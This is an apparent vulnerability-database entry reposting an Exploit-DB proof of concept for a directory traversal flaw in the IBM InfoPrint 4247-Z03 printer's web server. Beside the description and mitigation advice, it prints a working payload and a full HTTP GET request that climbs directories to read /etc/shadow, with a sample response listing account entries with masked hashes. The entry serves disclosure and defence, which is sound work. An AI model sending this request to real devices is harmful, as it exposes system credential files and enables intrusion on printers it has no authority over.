IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal

vendor:

InfoPrint 4247-Z03 Impact Matrix Printer

by:

Raif Berkay Dincel

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: InfoPrint 4247-Z03 Impact Matrix Printer

Affected Version From: 1.11

Affected Version To: 1.11

Patch Exists: NO

Related CWE: N/A

CPE: a:ibm:infoprint_4247-z03_impact_matrix_printer

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux Mint, Windows 10

2020

IBM InfoPrint 4247-Z03 Impact Matrix Printer – Directory Traversal

A directory traversal vulnerability exists in IBM InfoPrint 4247-Z03 Impact Matrix Printer, which allows an attacker to access sensitive files outside of the web root directory. This vulnerability is due to the application not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters. Successful exploitation of this vulnerability could allow an attacker to access sensitive files outside of the web root directory.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters. Additionally, access to sensitive files should be restricted to only those users who need access.

Source

Exploit-DB raw data:

# Exploit Title: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
# Date: 2020-01-01
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: ibm.com
# Software https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?subtype=ca&infotype=an&appname=iSource&supplier=897&letternum=ENUS107-295
# Version: 1.11
# CVE-ID: N/A
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2019/06/10

# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/[Payload]

# Proof of Concepts:

TARGET/./../../../../../../../../../../etc/shadow

# Request:

GET /./../../../../../../../../../../etc/shadow HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Connection: close

# Response:

root:::XXXXX
www-data:::XXXXX
nobody:::XXXXX
default:::XXXXX